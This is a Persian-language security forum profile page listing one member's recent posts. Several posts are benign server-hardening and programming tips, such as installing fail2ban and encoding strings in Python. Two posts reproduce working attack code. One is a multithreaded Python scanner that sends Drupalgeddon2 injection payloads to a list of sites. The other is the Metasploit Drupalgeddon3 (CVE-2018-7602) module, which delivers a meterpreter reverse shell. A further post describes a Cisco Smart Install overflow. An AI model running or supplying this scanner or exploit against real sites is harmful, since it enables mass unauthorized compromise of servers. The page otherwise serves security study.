رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Nazanin Wild

ICG Member
  • تعداد ارسال ها

    105
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    2

آخرین بار برد Nazanin Wild در دی 7 2020

Nazanin Wild یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

5 Neutral

6 دنبال کننده

درباره Nazanin Wild

  • تاریخ تولد ۹۴/۰۱/۰۷

Converted

  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. Nazanin Wild

    مکانیزم امنیتی seh

    @Reza.Black سلام میشه یک پست در رابطه با کلیه مباحث فازینگ بصورت جامع قرار دهید؟
  2. Nazanin Wild

    راهنمای در مورد الگوی فراموش شده

    سلام , اگر سامسونگ اکانت ساخته باشی و به نت وصل باشه خیلی راحت میتونی برداری پترن رو علاوه بر Pattren , پسورد هم یادتون رفته؟!
  3. سلام ببخشید میخواستم چندتا سوال بپرسم میتونیدکمک کنید
  4. اگه واقعا هکری ای پی سیستممو میدم بیا هکش کن...
    1. anonyanony

      anonyanony

      Exceptional @ از این حرف زدن تون مشخصه هیچی نمیفهمی :)
  5. شماها فقط دارین اسم هک رو خراب میکنین همین وگرنه همه میتونن با یه سرچ با دورک یا هرچیز دیگه ای هک کنن
  6. دستورات فعال سازی و استارت یادم رفت ! systemctl enable fail2ban systemctl start fail2ban
  7. Install fail2ban on centos 7 fail2ban یک ابزار جهت افزایش امنیت سرور و نظارت بر روی سرویس ها , پروتکل , پورت ها و دیگر منابع میباشد . که با نظارت بر روی این موارد در صورت مشاهده رفتار مشکوک , block میکند . بطور مثال میتوانیم با اضافه کردن یک رول مبنی بر سرویس ssh در صورت تلاش یک ای پی برای ورود غیرمجاز و تشخیص آن توسط fail2ban دسترسی ای پی مورد نظر مسدود شود . مبنای کار fail2ban هم به طوری هست که با مشخص کردن رول های خود و سرویس های خود ان هارا بصورت مداوم چک کرده و در صورت مشاهده رفتار مشکوک بصورت یکپارچه با فایروال , مانع دسترسی غیرمجاز میشود . نحوه نصب fail2ban به ssh سرور خود متصل شوید و با دستور زیر ابتدا سیستم عامل خود را بروز کنید : yum -y update مخزن epel را نصب میکنیم : yum -y install epel سپس fail2ban را نصب میکنیم : yum -y install fail2ban کانفیگ و تنظیمات fail2ban هم در پست بعدی در خدمت شما هستیم .
  8. نصب فایروال CSF نصب csf بصورت خلاصه و ساده install csf.zip
  9. Nazanin Wild

    تاپیک مشکلات شما در Python

    اگر اشتباه نکنم فکر میکنم با استفاده از متد str.encode() امکان پذیر است . "Matn morede nazar".encode(encoding="UTF-8")
  10. سلام , بستگی به مشخصات سرور داره ولی در حالت نرمال , اگر linux باشه بااستفاده از Secure shell یا ssh قابلیت اتصال رو به سرور دارین ...
  11. از sourceguardian استفاده کنید با محدودیت خاص ... ارتباط از طریق iframe ؟ فکر نمیکنم برای ارتباط باشه
  12. @mohsensd1373 سلام خدمت شما , درمورد بحث جلوگیری از کپی و سو استفاده راه صد در صدی وجود نداره چرا که در هر صورت امکان Decode و دسترسی به سورس نرم افزار میباشد . بنده با توجه به تجربه ناچیز خود چند راهکار ارائه خواهم داد : 1-استفاده از ioncube که با رمز گذاری بر روی فایل های php امکان دسترسی به فایل اصلی php رو از بقیه سلب خواهید کرد . در صورتی که خواستید از این روش استفاده کنید اطلاع دهید روش استفاده رو ذکر کنم ... 2- استفاده از sourceguardian میباشد که قابلیت رمزنگاری سورس برنامه و قفل گذاری را میباشد یکی از ویژگی های مهم این نرم افزار قابلیت قردادن , domain name , Server ip Address و تاریخ لایسنس برای نرم افزار خود میباشد . یکی دیگر از ویژگی های مثبت sourceguardian , درصورت تغییر حتی بخش کوچکی از در فایل encode شده کل برنامه از کار خواهد افتاد ... سایت اصلی این نرم افزار : https://www.sourceguardian.com/ جهت استفاده نیاز به لایسنس دارید که فکر میکنم توسط مدیریت قابل تهیه خواهید بود . @root3r
  13. Nazanin Wild

    اسکنر اسیب پذیری Drupal Geddon2

    Drupalgeddon2 Scanner import os import workerpool import requests from lxml.html import fromstring import sys import re from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) siteslistx=sys.argv[1] temp="{0:10}" def check_if_drupal(host): temp="{0:10}" headers = { 'User-Agent': 'Firefox/58.0', 'Accept-Language': 'en-US,en;q=0.5', } try: myopen = requests.get(host,timeout=5,allow_redirects=True,headers=headers) except: return 0 response = myopen.text if response.find("sites/all/")!=-1: print temp.format("\033[95m + Drupal detected @ "+host+"\n\033[0m"), xx=open("drupal.txt","ab") xx.write(host+"\r\n") xx.close() return 1 return 0 def is_vulnerable1(HOST): get_params = {'q':'user/password', 'name[#post_render][]':'printf', 'name[#markup]':'Jnkfoooo', 'name[#type]':'markup'} post_params = {'form_id':'user_pass', '_triggering_element_name':'name'} headers = { 'User-Agent': 'Firefox/58.0', 'Accept-Language': 'en-US,en;q=0.5', } r = requests.post(HOST, data=post_params, params=get_params,headers=headers) m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text) if m: found = m.group(1) get_params = {'q':'file/ajax/name/#value/' + found} post_params = {'form_build_id':found} r = requests.post(HOST, data=post_params, params=get_params) if re.match(r'^Jnkfooo.*',r.text): print temp.format("\033[92m + "+HOST+" is vulnerable \033[0m\n"), pew=open("vuln.txt","ab") pew.write(HOST+"\r\n") pew.close() return 1 else: return 0 def scan(host): host=host.strip("\r\n")+"/" is_drupal=check_if_drupal(host) if is_drupal == 1: is_vulnerable1(host) print "+ Drupal scanner module launched" print "! Processing websites from "+siteslistx siteslist=open(siteslistx,"r") pool = workerpool.WorkerPool(size=100) pool.map(scan, siteslist) pool.shutdown() pool.wait() print "! Done" sys.exit()
  14. Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit) Metasploit Framework برای اسیب پذیری Drupalgeddon دروپال ... ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Drupalgeddon3', 'Description' => %q{ CVE-2018-7602 / SA-CORE-2018-004 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site Which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution The module can load msf PHP arch payloads, using the php/base64 encoder. The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' }, 'License' => MSF_LICENSE, 'Author' => [ 'SixP4ck3r', # Research and port to MSF 'Blaklis' # Initial PoC ], 'References' => [ ['SA-CORE', '2018-004'], ['CVE', '2018-7602'], ], 'DefaultOptions' => { 'encoder' => 'php/base64', 'payload' => 'php/meterpreter/reverse_tcp', }, 'Privileged' => false, 'Platform' => ['php'], 'Arch' => [ARCH_PHP], 'Targets' => [ ['User register form with exec', {}], ], 'DisclosureDate' => 'Apr 29 2018', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']), OptString.new('DRUPAL_NODE', [ true, "Exist Node Number (Page, Article, Forum topic, or a Post)", '1']), OptString.new('DRUPAL_SESSION', [ true, "Authenticated Cookie Session", '']), ]) register_advanced_options( [ ]) end def uri_path normalize_uri(target_uri.path) end def start_exploit drupal_node = datastore['DRUPAL_NODE'] res = send_request_cgi({ 'cookie' => datastore['DRUPAL_SESSION'], 'method' => 'GET', 'uri' => "#{uri_path}/node/#{drupal_node}/delete" }) form_token = res.body.scan( /form_token" value="([^>]*)" \/>/).last.first print "[*] Token Form -> #{form_token}\n" r2 = send_request_cgi({ 'method' => 'POST', 'cookie' => datastore['DRUPAL_SESSION'], 'uri' => "#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'", 'vars_post' => { 'form_id' => 'node_delete_confirm', '_triggering_element_name' => 'form_id', 'form_token'=> "#{form_token}" } }) form_build_id = r2.body.scan( /form_build_id" value="([^>]*)" \/>/).last.first print "[*] Token Form_build_id -> #{form_build_id}\n" r3 = send_request_cgi({ 'method' => 'POST', 'cookie' => datastore['DRUPAL_SESSION'], 'uri' => "#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}", 'vars_post' => { 'form_build_id' => "#{form_build_id}" } }) end def exploit case datastore['TARGET'] when 0 start_exploit else fail_with(Failure::BadConfig, "Your target is invalid.") end end end
  15. سلام بسیار هم عالی فکر میکنم اولین مرجع فارسی هست که به این آسیب پذیری اشاره کرد ! اسیب پذیری که در ویژگی Smart Install بوجود اومد منجر به ایجاد دسترسی هکر یا نفوذ گر بصورت remote خواهد شد . این اسیب پذیری که به علت اعتبار سنجی نادرست پکت های data میباشد نفوذگر رو قادر میسازد با ایجاد و ارسال Smart Install message بر روی پورت 4786 TCP و سر ریز بافر منجر به : بازگردانی تنظیمات به حالت پیشفرض (راه اندازی مجدد) اجرای کد های مدنظر بر روی دستگاه ها اخر ایجاد یک حلقه نامحدود و وقوع حالت کرش شود

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...